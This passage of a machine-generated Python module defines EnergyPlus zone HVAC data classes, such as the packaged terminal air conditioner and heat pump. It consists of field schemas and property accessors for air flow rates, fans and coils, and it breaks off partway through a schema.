        return self["Maximum Supply Air Flow Rate"]

    @maximum_supply_air_flow_rate.setter
    def maximum_supply_air_flow_rate(self, value=None):
        """Assign a new value to IDD field `Maximum Supply Air Flow Rate`.

        Args:
            value (float or "Autosize"): flow rate in m3/s, or "Autosize".

        Raises:
            ValueError: if `value` is rejected by field validation.
        """
        self["Maximum Supply Air Flow Rate"] = value

    @property
    def maximum_outdoor_air_flow_rate(self):
        """IDD field `Maximum Outdoor Air Flow Rate`.

        | Units: m3/s

        Returns:
            float or "Autosize": current value, or None when the field is unset.
        """
        return self["Maximum Outdoor Air Flow Rate"]

    @maximum_outdoor_air_flow_rate.setter
    def maximum_outdoor_air_flow_rate(self, value=None):
        """Assign a new value to IDD field `Maximum Outdoor Air Flow Rate`.

        Args:
            value (float or "Autosize"): flow rate in m3/s, or "Autosize".

        Raises:
            ValueError: if `value` is rejected by field validation.
        """
        self["Maximum Outdoor Air Flow Rate"] = value

    @property
    def air_inlet_node_name(self):
        """IDD field `Air Inlet Node Name`.

        Returns:
            str: current value, or None when the field is unset.
        """
        return self["Air Inlet Node Name"]

    @air_inlet_node_name.setter
    def air_inlet_node_name(self, value=None):
        """Assign a new value to IDD field `Air Inlet Node Name`.

        Args:
            value (str): the node name to store.

        Raises:
            ValueError: if `value` is rejected by field validation.
        """
        self["Air Inlet Node Name"] = value

    @property
    def air_outlet_node_name(self):
        """IDD field `Air Outlet Node Name`.

        Returns:
            str: current value, or None when the field is unset.
        """
        return self["Air Outlet Node Name"]

    @air_outlet_node_name.setter
    def air_outlet_node_name(self, value=None):
        """Assign a new value to IDD field `Air Outlet Node Name`.

        Args:
            value (str): the node name to store.

        Raises:
            ValueError: if `value` is rejected by field validation.
        """
        self["Air Outlet Node Name"] = value

    @property
    def outdoor_air_mixer_object_type(self):
        """IDD field `Outdoor Air Mixer Object Type`.

        | Currently only one OutdoorAir:Mixer object type is available.

        Returns:
            str: current value, or None when the field is unset.
        """
        return self["Outdoor Air Mixer Object Type"]

    @outdoor_air_mixer_object_type.setter
    def outdoor_air_mixer_object_type(self, value=None):
        """Assign a new value to IDD field `Outdoor Air Mixer Object Type`.

        Args:
            value (str): the object type to store.

        Raises:
            ValueError: if `value` is rejected by field validation.
        """
        self["Outdoor Air Mixer Object Type"] = value

    @property
    def outdoor_air_mixer_name(self):
        """IDD field `Outdoor Air Mixer Name`.

        Returns:
            str: current value, or None when the field is unset.
        """
        return self["Outdoor Air Mixer Name"]

    @outdoor_air_mixer_name.setter
    def outdoor_air_mixer_name(self, value=None):
        """Assign a new value to IDD field `Outdoor Air Mixer Name`.

        Args:
            value (str): the object name to store.

        Raises:
            ValueError: if `value` is rejected by field validation.
        """
        self["Outdoor Air Mixer Name"] = value

    @property
    def supply_air_fan_object_type(self):
        """IDD field `Supply Air Fan Object Type`.

        | Fan:ConstantVolume only works when continuous fan operation is
        | used for the entire simulation (all supply air fan operating mode
        | schedule values are greater than 0). If any fan operating mode
        | schedule values are 0, a Fan:OnOff object must be used.

        Returns:
            str: current value, or None when the field is unset.
        """
        return self["Supply Air Fan Object Type"]

    @supply_air_fan_object_type.setter
    def supply_air_fan_object_type(self, value=None):
        """Assign a new value to IDD field `Supply Air Fan Object Type`.

        Args:
            value (str): the object type to store.

        Raises:
            ValueError: if `value` is rejected by field validation.
        """
        self["Supply Air Fan Object Type"] = value

    @property
    def supply_air_fan_name(self):
        """IDD field `Supply Air Fan Name`.

        | Fan type Fan:ConstantVolume is used with continuous fan,
        | and fan type Fan:OnOff is used with cycling fan.

        Returns:
            str: current value, or None when the field is unset.
        """
        return self["Supply Air Fan Name"]

    @supply_air_fan_name.setter
    def supply_air_fan_name(self, value=None):
        """Assign a new value to IDD field `Supply Air Fan Name`.

        Args:
            value (str): the fan name to store.

        Raises:
            ValueError: if `value` is rejected by field validation.
        """
        self["Supply Air Fan Name"] = value

    @property
    def cooling_coil_object_type(self):
        """IDD field `Cooling Coil Object Type`.

        Returns:
            str: current value, or None when the field is unset.
        """
        return self["Cooling Coil Object Type"]

    @cooling_coil_object_type.setter
    def cooling_coil_object_type(self, value=None):
        """Assign a new value to IDD field `Cooling Coil Object Type`.

        Args:
            value (str): the object type to store.

        Raises:
            ValueError: if `value` is rejected by field validation.
        """
        self["Cooling Coil Object Type"] = value

    @property
    def dx_cooling_coil_name(self):
        """IDD field `DX Cooling Coil Name`.

        Returns:
            str: current value, or None when the field is unset.
        """
        return self["DX Cooling Coil Name"]

    @dx_cooling_coil_name.setter
    def dx_cooling_coil_name(self, value=None):
        """Assign a new value to IDD field `DX Cooling Coil Name`.

        Args:
            value (str): the coil name to store.

        Raises:
            ValueError: if `value` is rejected by field validation.
        """
        self["DX Cooling Coil Name"] = value

    @property
    def supply_air_fan_operating_mode_schedule_name(self):
        """IDD field `Supply Air Fan Operating Mode Schedule Name`.

        | Name of a schedule that controls fan operation. Schedule values
        | of 0 denote cycling fan operation (fan cycles with the cooling
        | coil); values greater than 0 denote constant fan operation (fan
        | runs continually regardless of coil operation). Left blank, the
        | fan operating mode defaults to cycling operation.

        Returns:
            str: current value, or None when the field is unset.
        """
        return self["Supply Air Fan Operating Mode Schedule Name"]

    @supply_air_fan_operating_mode_schedule_name.setter
    def supply_air_fan_operating_mode_schedule_name(self, value=None):
        """Assign a new value to IDD field `Supply Air Fan Operating Mode
        Schedule Name`.

        Args:
            value (str): the schedule name to store.

        Raises:
            ValueError: if `value` is rejected by field validation.
        """
        self["Supply Air Fan Operating Mode Schedule Name"] = value

    @property
    def fan_placement(self):
        """IDD field `Fan Placement`.

        Returns:
            str: current value, or None when the field is unset.
        """
        return self["Fan Placement"]

    @fan_placement.setter
    def fan_placement(self, value=None):
        """Assign a new value to IDD field `Fan Placement`.

        Args:
            value (str): the placement to store.

        Raises:
            ValueError: if `value` is rejected by field validation.
        """
        self["Fan Placement"] = value

    @property
    def cooling_convergence_tolerance(self):
        """IDD field `Cooling Convergence Tolerance`.

        | Default value: 0.001

        Returns:
            float: current value, or None when the field is unset.
        """
        return self["Cooling Convergence Tolerance"]

    @cooling_convergence_tolerance.setter
    def cooling_convergence_tolerance(self, value=0.001):
        """Assign a new value to IDD field `Cooling Convergence Tolerance`.

        Args:
            value (float): the tolerance to store. Defaults to 0.001.

        Raises:
            ValueError: if `value` is rejected by field validation.
        """
        self["Cooling Convergence Tolerance"] = value

    @property
    def availability_manager_list_name(self):
        """IDD field `Availability Manager List Name`.

        | Enter the name of an AvailabilityManagerAssignmentList object.

        Returns:
            str: current value, or None when the field is unset.
        """
        return self["Availability Manager List Name"]

    @availability_manager_list_name.setter
    def availability_manager_list_name(self, value=None):
        """Assign a new value to IDD field `Availability Manager List Name`.

        Args:
            value (str): the list name to store.

        Raises:
            ValueError: if `value` is rejected by field validation.
        """
        self["Availability Manager List Name"] = value

    @property
    def design_specification_zonehvac_sizing_object_name(self):
        """IDD field `Design Specification ZoneHVAC Sizing Object Name`.

        | Enter the name of a DesignSpecificationZoneHVACSizing object.

        Returns:
            str: current value, or None when the field is unset.
        """
        return self["Design Specification ZoneHVAC Sizing Object Name"]

    @design_specification_zonehvac_sizing_object_name.setter
    def design_specification_zonehvac_sizing_object_name(self, value=None):
        """Assign a new value to IDD field `Design Specification ZoneHVAC
        Sizing Object Name`.

        Args:
            value (str): the object name to store.

        Raises:
            ValueError: if `value` is rejected by field validation.
        """
        self["Design Specification ZoneHVAC Sizing Object Name"] = value
class ZoneHvacPackagedTerminalAirConditioner(DataObject):

    """ Corresponds to IDD object `ZoneHVAC:PackagedTerminalAirConditioner`
        Packaged terminal air conditioner (PTAC). Forced-convection heating-cooling unit
        with supply fan, direct expansion (DX) cooling coil, heating coil (gas, electric, hot
        water, or steam) and fixed-position outdoor air mixer.
    """
    # NOTE: this class is machine-generated from the EnergyPlus IDD.
    # `_schema` is the per-field metadata (IDD field order, defaults, accepted
    # values, units, required flags) that the DataObject base class uses for
    # validation and for the dict-style access (`self["Field Name"]`) used by
    # the properties below. The OrderedDict entry order mirrors the IDD field
    # order and must not be changed.
    _schema = {'extensible-fields': OrderedDict(),
               'fields': OrderedDict([(u'name',
                                       {'name': u'Name',
                                        'pyname': u'name',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'alpha'}),
                                      (u'availability schedule name',
                                       {'name': u'Availability Schedule Name',
                                        'pyname': u'availability_schedule_name',
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'object-list'}),
                                      (u'air inlet node name',
                                       {'name': u'Air Inlet Node Name',
                                        'pyname': u'air_inlet_node_name',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'node'}),
                                      (u'air outlet node name',
                                       {'name': u'Air Outlet Node Name',
                                        'pyname': u'air_outlet_node_name',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'node'}),
                                      (u'outdoor air mixer object type',
                                       {'name': u'Outdoor Air Mixer Object Type',
                                        'pyname': u'outdoor_air_mixer_object_type',
                                        'required-field': True,
                                        'autosizable': False,
                                        'accepted-values': [u'OutdoorAir:Mixer'],
                                        'autocalculatable': False,
                                        'type': 'alpha'}),
                                      (u'outdoor air mixer name',
                                       {'name': u'Outdoor Air Mixer Name',
                                        'pyname': u'outdoor_air_mixer_name',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'object-list'}),
                                      (u'cooling supply air flow rate',
                                       {'name': u'Cooling Supply Air Flow Rate',
                                        'pyname': u'cooling_supply_air_flow_rate',
                                        'minimum>': 0.0,
                                        'required-field': True,
                                        'autosizable': True,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'm3/s'}),
                                      (u'heating supply air flow rate',
                                       {'name': u'Heating Supply Air Flow Rate',
                                        'pyname': u'heating_supply_air_flow_rate',
                                        'minimum>': 0.0,
                                        'required-field': True,
                                        'autosizable': True,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'm3/s'}),
                                      (u'no load supply air flow rate',
                                       {'name': u'No Load Supply Air Flow Rate',
                                        'pyname': u'no_load_supply_air_flow_rate',
                                        'required-field': False,
                                        'autosizable': True,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'm3/s'}),
                                      (u'cooling outdoor air flow rate',
                                       {'name': u'Cooling Outdoor Air Flow Rate',
                                        'pyname': u'cooling_outdoor_air_flow_rate',
                                        'required-field': True,
                                        'autosizable': True,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'm3/s'}),
                                      (u'heating outdoor air flow rate',
                                       {'name': u'Heating Outdoor Air Flow Rate',
                                        'pyname': u'heating_outdoor_air_flow_rate',
                                        'required-field': True,
                                        'autosizable': True,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'm3/s'}),
                                      (u'no load outdoor air flow rate',
                                       {'name': u'No Load Outdoor Air Flow Rate',
                                        'pyname': u'no_load_outdoor_air_flow_rate',
                                        'required-field': False,
                                        'autosizable': True,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'm3/s'}),
                                      (u'supply air fan object type',
                                       {'name': u'Supply Air Fan Object Type',
                                        'pyname': u'supply_air_fan_object_type',
                                        'required-field': True,
                                        'autosizable': False,
                                        'accepted-values': [u'Fan:OnOff',
                                                            u'Fan:ConstantVolume'],
                                        'autocalculatable': False,
                                        'type': 'alpha'}),
                                      (u'supply air fan name',
                                       {'name': u'Supply Air Fan Name',
                                        'pyname': u'supply_air_fan_name',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'object-list'}),
                                      (u'heating coil object type',
                                       {'name': u'Heating Coil Object Type',
                                        'pyname': u'heating_coil_object_type',
                                        'required-field': True,
                                        'autosizable': False,
                                        'accepted-values': [u'Coil:Heating:Gas',
                                                            u'Coil:Heating:Electric',
                                                            u'Coil:Heating:Water',
                                                            u'Coil:Heating:Steam'],
                                        'autocalculatable': False,
                                        'type': 'alpha'}),
                                      (u'heating coil name',
                                       {'name': u'Heating Coil Name',
                                        'pyname': u'heating_coil_name',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'object-list'}),
                                      (u'cooling coil object type',
                                       {'name': u'Cooling Coil Object Type',
                                        'pyname': u'cooling_coil_object_type',
                                        'required-field': True,
                                        'autosizable': False,
                                        'accepted-values': [u'Coil:Cooling:DX:SingleSpeed',
                                                            u'Coil:Cooling:DX:VariableSpeed',
                                                            u'CoilSystem:Cooling:DX:HeatExchangerAssisted'],
                                        'autocalculatable': False,
                                        'type': 'alpha'}),
                                      (u'cooling coil name',
                                       {'name': u'Cooling Coil Name',
                                        'pyname': u'cooling_coil_name',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'object-list'}),
                                      (u'fan placement',
                                       {'name': u'Fan Placement',
                                        'pyname': u'fan_placement',
                                        'default': u'DrawThrough',
                                        'required-field': False,
                                        'autosizable': False,
                                        'accepted-values': [u'BlowThrough',
                                                            u'DrawThrough'],
                                        'autocalculatable': False,
                                        'type': 'alpha'}),
                                      (u'supply air fan operating mode schedule name',
                                       {'name': u'Supply Air Fan Operating Mode Schedule Name',
                                        'pyname': u'supply_air_fan_operating_mode_schedule_name',
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'object-list'}),
                                      (u'availability manager list name',
                                       {'name': u'Availability Manager List Name',
                                        'pyname': u'availability_manager_list_name',
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'object-list'}),
                                      (u'design specification zonehvac sizing object name',
                                       {'name': u'Design Specification ZoneHVAC Sizing Object Name',
                                        'pyname': u'design_specification_zonehvac_sizing_object_name',
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'object-list'})]),
               'format': None,
               'group': u'Zone HVAC Forced Air Units',
               'min-fields': 18,
               'name': u'ZoneHVAC:PackagedTerminalAirConditioner',
               'pyname': u'ZoneHvacPackagedTerminalAirConditioner',
               'required-object': False,
               'unique-object': False}

    @property
    def name(self):
        """field `Name`
        | Unique name for this packaged terminal air conditioner object.
        Args:
            value (str): value for IDD Field `Name`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            str: the value of `name` or None if not set
        """
        return self["Name"]

    @name.setter
    def name(self, value=None):
        """Corresponds to IDD field `Name`"""
        self["Name"] = value

    @property
    def availability_schedule_name(self):
        """field `Availability Schedule Name`
        | Availability schedule name for this system. Schedule value > 0 means the system is available.
        | If this field is blank, the system is always available.
        | Schedule values of 0 denote the unit is off.
        Args:
            value (str): value for IDD Field `Availability Schedule Name`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            str: the value of `availability_schedule_name` or None if not set
        """
        return self["Availability Schedule Name"]

    @availability_schedule_name.setter
    def availability_schedule_name(self, value=None):
        """Corresponds to IDD field `Availability Schedule Name`"""
        self["Availability Schedule Name"] = value

    @property
    def air_inlet_node_name(self):
        """field `Air Inlet Node Name`
        | Air inlet node for the PTAC must be a zone air exhaust Node.
        Args:
            value (str): value for IDD Field `Air Inlet Node Name`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            str: the value of `air_inlet_node_name` or None if not set
        """
        return self["Air Inlet Node Name"]

    @air_inlet_node_name.setter
    def air_inlet_node_name(self, value=None):
        """Corresponds to IDD field `Air Inlet Node Name`"""
        self["Air Inlet Node Name"] = value

    @property
    def air_outlet_node_name(self):
        """field `Air Outlet Node Name`
        | Air outlet node for the PTAC must be a zone air inlet node.
        Args:
            value (str): value for IDD Field `Air Outlet Node Name`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            str: the value of `air_outlet_node_name` or None if not set
        """
        return self["Air Outlet Node Name"]

    @air_outlet_node_name.setter
    def air_outlet_node_name(self, value=None):
        """Corresponds to IDD field `Air Outlet Node Name`"""
        self["Air Outlet Node Name"] = value

    @property
    def outdoor_air_mixer_object_type(self):
        """field `Outdoor Air Mixer Object Type`
        | currently only one OutdoorAir:Mixer object type is available.
        Args:
            value (str): value for IDD Field `Outdoor Air Mixer Object Type`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            str: the value of `outdoor_air_mixer_object_type` or None if not set
        """
        return self["Outdoor Air Mixer Object Type"]

    @outdoor_air_mixer_object_type.setter
    def outdoor_air_mixer_object_type(self, value=None):
        """Corresponds to IDD field `Outdoor Air Mixer Object Type`"""
        self["Outdoor Air Mixer Object Type"] = value

    @property
    def outdoor_air_mixer_name(self):
        """field `Outdoor Air Mixer Name`
        | Needs to match the name of the PTAC outdoor air mixer object.
        Args:
            value (str): value for IDD Field `Outdoor Air Mixer Name`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            str: the value of `outdoor_air_mixer_name` or None if not set
        """
        return self["Outdoor Air Mixer Name"]

    @outdoor_air_mixer_name.setter
    def outdoor_air_mixer_name(self, value=None):
        """Corresponds to IDD field `Outdoor Air Mixer Name`"""
        self["Outdoor Air Mixer Name"] = value

    @property
    def cooling_supply_air_flow_rate(self):
        """field `Cooling Supply Air Flow Rate`
        | Must be less than or equal to fan size.
        | Units: m3/s
        Args:
            value (float or "Autosize"): value for IDD Field `Cooling Supply Air Flow Rate`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            float or "Autosize": the value of `cooling_supply_air_flow_rate` or None if not set
        """
        return self["Cooling Supply Air Flow Rate"]

    @cooling_supply_air_flow_rate.setter
    def cooling_supply_air_flow_rate(self, value=None):
        """Corresponds to IDD field `Cooling Supply Air Flow Rate`"""
        self["Cooling Supply Air Flow Rate"] = value

    @property
    def heating_supply_air_flow_rate(self):
        """field `Heating Supply Air Flow Rate`
        | Must be less than or equal to fan size.
        | Units: m3/s
        Args:
            value (float or "Autosize"): value for IDD Field `Heating Supply Air Flow Rate`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            float or "Autosize": the value of `heating_supply_air_flow_rate` or None if not set
        """
        return self["Heating Supply Air Flow Rate"]

    @heating_supply_air_flow_rate.setter
    def heating_supply_air_flow_rate(self, value=None):
        """Corresponds to IDD field `Heating Supply Air Flow Rate`"""
        self["Heating Supply Air Flow Rate"] = value

    @property
    def no_load_supply_air_flow_rate(self):
        """field `No Load Supply Air Flow Rate`
        | Must be less than or equal to fan size.
        | Only used when supply air fan operating mode schedule values specify continuous fan
        | (schedule values greater than 0 specify continuous fan operation).
        | This air flow rate is used when no heating or cooling is required and the cooling or
        | heating coil is off. If this field is left blank or zero, the supply air flow rate
        | from the previous on cycle (either cooling or heating) is used.
        | Units: m3/s
        Args:
            value (float or "Autosize"): value for IDD Field `No Load Supply Air Flow Rate`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            float or "Autosize": the value of `no_load_supply_air_flow_rate` or None if not set
        """
        return self["No Load Supply Air Flow Rate"]

    @no_load_supply_air_flow_rate.setter
    def no_load_supply_air_flow_rate(self, value=None):
        """Corresponds to IDD field `No Load Supply Air Flow Rate`"""
        self["No Load Supply Air Flow Rate"] = value

    @property
    def cooling_outdoor_air_flow_rate(self):
        """field `Cooling Outdoor Air Flow Rate`
        | Must be less than or equal to supply air flow rate during cooling operation.
        | Units: m3/s
        Args:
            value (float or "Autosize"): value for IDD Field `Cooling Outdoor Air Flow Rate`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            float or "Autosize": the value of `cooling_outdoor_air_flow_rate` or None if not set
        """
        return self["Cooling Outdoor Air Flow Rate"]

    @cooling_outdoor_air_flow_rate.setter
    def cooling_outdoor_air_flow_rate(self, value=None):
        """Corresponds to IDD field `Cooling Outdoor Air Flow Rate`"""
        self["Cooling Outdoor Air Flow Rate"] = value

    @property
    def heating_outdoor_air_flow_rate(self):
        """field `Heating Outdoor Air Flow Rate`
        | Must be less than or equal to supply air flow rate during heating operation.
        | Units: m3/s
        Args:
            value (float or "Autosize"): value for IDD Field `Heating Outdoor Air Flow Rate`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            float or "Autosize": the value of `heating_outdoor_air_flow_rate` or None if not set
        """
        return self["Heating Outdoor Air Flow Rate"]

    @heating_outdoor_air_flow_rate.setter
    def heating_outdoor_air_flow_rate(self, value=None):
        """Corresponds to IDD field `Heating Outdoor Air Flow Rate`"""
        self["Heating Outdoor Air Flow Rate"] = value

    @property
    def no_load_outdoor_air_flow_rate(self):
        """field `No Load Outdoor Air Flow Rate`
        | Only used when supply air fan operating mode schedule values specify continuous fan
        | (schedule values greater than 0 specify continuous fan operation).
        | This air flow rate is used when no heating or cooling is required and the cooling or
        | heating coil is off. If this field is left blank or zero, the outdoor air flow rate
        | from the previous on cycle (either cooling or heating) is used.
        | Units: m3/s
        Args:
            value (float or "Autosize"): value for IDD Field `No Load Outdoor Air Flow Rate`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            float or "Autosize": the value of `no_load_outdoor_air_flow_rate` or None if not set
        """
        return self["No Load Outdoor Air Flow Rate"]

    @no_load_outdoor_air_flow_rate.setter
    def no_load_outdoor_air_flow_rate(self, value=None):
        """Corresponds to IDD field `No Load Outdoor Air Flow Rate`"""
        self["No Load Outdoor Air Flow Rate"] = value

    @property
    def supply_air_fan_object_type(self):
        """field `Supply Air Fan Object Type`
        | Fan:ConstantVolume only works when continuous fan operation is used the entire
        | simulation (all supply air fan operating mode schedule values are greater than 0).
        | If any fan operating mode schedule values are 0 a Fan:OnOff object must be used.
        Args:
            value (str): value for IDD Field `Supply Air Fan Object Type`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            str: the value of `supply_air_fan_object_type` or None if not set
        """
        return self["Supply Air Fan Object Type"]

    @supply_air_fan_object_type.setter
    def supply_air_fan_object_type(self, value=None):
        """Corresponds to IDD field `Supply Air Fan Object Type`"""
        self["Supply Air Fan Object Type"] = value

    @property
    def supply_air_fan_name(self):
        """field `Supply Air Fan Name`
        | Needs to match in the fan object.
        Args:
            value (str): value for IDD Field `Supply Air Fan Name`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            str: the value of `supply_air_fan_name` or None if not set
        """
        return self["Supply Air Fan Name"]

    @supply_air_fan_name.setter
    def supply_air_fan_name(self, value=None):
        """Corresponds to IDD field `Supply Air Fan Name`"""
        self["Supply Air Fan Name"] = value

    @property
    def heating_coil_object_type(self):
        """field `Heating Coil Object Type`
        | Select the type of heating coil.
        Args:
            value (str): value for IDD Field `Heating Coil Object Type`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            str: the value of `heating_coil_object_type` or None if not set
        """
        return self["Heating Coil Object Type"]

    @heating_coil_object_type.setter
    def heating_coil_object_type(self, value=None):
        """Corresponds to IDD field `Heating Coil Object Type`"""
        self["Heating Coil Object Type"] = value

    @property
    def heating_coil_name(self):
        """field `Heating Coil Name`
        | Needs to match in the heating coil object.
        Args:
            value (str): value for IDD Field `Heating Coil Name`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            str: the value of `heating_coil_name` or None if not set
        """
        return self["Heating Coil Name"]

    @heating_coil_name.setter
    def heating_coil_name(self, value=None):
        """Corresponds to IDD field `Heating Coil Name`"""
        self["Heating Coil Name"] = value

    @property
    def cooling_coil_object_type(self):
        """field `Cooling Coil Object Type`
        | Select the type of Cooling Coil.
        | Only works with Coil:Cooling:DX:SingleSpeed or
        | CoilSystem:Cooling:DX:HeatExchangerAssisted or
        | Coil:Cooling:DX:VariableSpeed.
        Args:
            value (str): value for IDD Field `Cooling Coil Object Type`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            str: the value of `cooling_coil_object_type` or None if not set
        """
        return self["Cooling Coil Object Type"]

    @cooling_coil_object_type.setter
    def cooling_coil_object_type(self, value=None):
        """Corresponds to IDD field `Cooling Coil Object Type`"""
        self["Cooling Coil Object Type"] = value

    @property
    def cooling_coil_name(self):
        """field `Cooling Coil Name`
        | Needs to match a DX cooling coil object.
        Args:
            value (str): value for IDD Field `Cooling Coil Name`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            str: the value of `cooling_coil_name` or None if not set
        """
        return self["Cooling Coil Name"]

    @cooling_coil_name.setter
    def cooling_coil_name(self, value=None):
        """Corresponds to IDD field `Cooling Coil Name`"""
        self["Cooling Coil Name"] = value

    @property
    def fan_placement(self):
        """field `Fan Placement`
        | Select fan placement as either blow through or draw through.
        | Default value: DrawThrough
        Args:
            value (str): value for IDD Field `Fan Placement`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            str: the value of `fan_placement` or None if not set
        """
        return self["Fan Placement"]

    @fan_placement.setter
    def fan_placement(self, value="DrawThrough"):
        """Corresponds to IDD field `Fan Placement`"""
        self["Fan Placement"] = value

    @property
    def supply_air_fan_operating_mode_schedule_name(self):
        """field `Supply Air Fan Operating Mode Schedule Name`
        | Enter the name of a schedule that controls fan operation. Schedule Name values of 0 denote
        | cycling fan operation (fan cycles with cooling or heating coil). Schedule Name values greater
        | than 0 denote constant fan operation (fan runs continually regardless of coil operation).
        Args:
            value (str): value for IDD Field `Supply Air Fan Operating Mode Schedule Name`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            str: the value of `supply_air_fan_operating_mode_schedule_name` or None if not set
        """
        return self["Supply Air Fan Operating Mode Schedule Name"]

    @supply_air_fan_operating_mode_schedule_name.setter
    def supply_air_fan_operating_mode_schedule_name(self, value=None):
        """Corresponds to IDD field `Supply Air Fan Operating Mode Schedule
        Name`"""
        self["Supply Air Fan Operating Mode Schedule Name"] = value

    @property
    def availability_manager_list_name(self):
        """field `Availability Manager List Name`
        | Enter the name of an AvailabilityManagerAssignmentList object.
        Args:
            value (str): value for IDD Field `Availability Manager List Name`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            str: the value of `availability_manager_list_name` or None if not set
        """
        return self["Availability Manager List Name"]

    @availability_manager_list_name.setter
    def availability_manager_list_name(self, value=None):
        """Corresponds to IDD field `Availability Manager List Name`"""
        self["Availability Manager List Name"] = value

    @property
    def design_specification_zonehvac_sizing_object_name(self):
        """field `Design Specification ZoneHVAC Sizing Object Name`
        | Enter the name of a DesignSpecificationZoneHVACSizing object.
        Args:
            value (str): value for IDD Field `Design Specification ZoneHVAC Sizing Object Name`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            str: the value of `design_specification_zonehvac_sizing_object_name` or None if not set
        """
        return self["Design Specification ZoneHVAC Sizing Object Name"]

    @design_specification_zonehvac_sizing_object_name.setter
    def design_specification_zonehvac_sizing_object_name(self, value=None):
        """Corresponds to IDD field `Design Specification ZoneHVAC Sizing
        Object Name`"""
        self["Design Specification ZoneHVAC Sizing Object Name"] = value
class ZoneHvacPackagedTerminalHeatPump(DataObject):
""" Corresponds to IDD object `ZoneHVAC:PackagedTerminalHeatPump`
Packaged terminal heat pump (PTHP). Forced-convection heating-cooling unit with
supply fan, direct expansion (DX) cooling coil, DX heating coil (air-to-air heat
pump), supplemental heating coil (gas, electric, hot water, or steam), and
fixed-position outdoor air mixer.
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'availability schedule name',
{'name': u'Availability Schedule Name',
'pyname': u'availability_schedule_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'air inlet node name',
{'name': u'Air Inlet Node Name',
'pyname': u'air_inlet_node_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'node'}),
(u'air outlet node name',
{'name': u'Air Outlet Node Name',
'pyname': u'air_outlet_node_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'node'}),
(u'outdoor air mixer object type',
{'name': u'Outdoor Air Mixer Object Type',
'pyname': u'outdoor_air_mixer_object_type',
'required-field': True,
'autosizable': False,
'accepted-values': [u'OutdoorAir:Mixer'],
'autocalculatable': False,
'type': 'alpha'}),
(u'outdoor air mixer name',
{'name': u'Outdoor Air Mixer Name',
'pyname': u'outdoor_air_mixer_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'cooling supply air flow rate',
{'name': u'Cooling Supply Air Flow Rate',
'pyname': u'cooling_supply_air_flow_rate',
'minimum>': 0.0,
'required-field': True,
'autosizable': True,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s'}),
(u'heating supply air flow rate',
{'name': u'Heating Supply Air Flow Rate',
'pyname': u'heating_supply_air_flow_rate',
'minimum>': 0.0,
'required-field': True,
'autosizable': True,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s'}),
(u'no load supply air flow rate',
{'name': u'No Load Supply Air Flow Rate',
'pyname': u'no_load_supply_air_flow_rate',
'required-field': False,
'autosizable': True,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s'}),
(u'cooling outdoor air flow rate',
{'name': u'Cooling Outdoor Air Flow Rate',
'pyname': u'cooling_outdoor_air_flow_rate',
'required-field': True,
'autosizable': True,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s'}),
(u'heating outdoor air flow rate',
{'name': u'Heating Outdoor Air Flow Rate',
'pyname': u'heating_outdoor_air_flow_rate',
'required-field': True,
'autosizable': True,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s'}),
(u'no load outdoor air flow rate',
{'name': u'No Load Outdoor Air Flow Rate',
'pyname': u'no_load_outdoor_air_flow_rate',
'required-field': False,
'autosizable': True,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s'}),
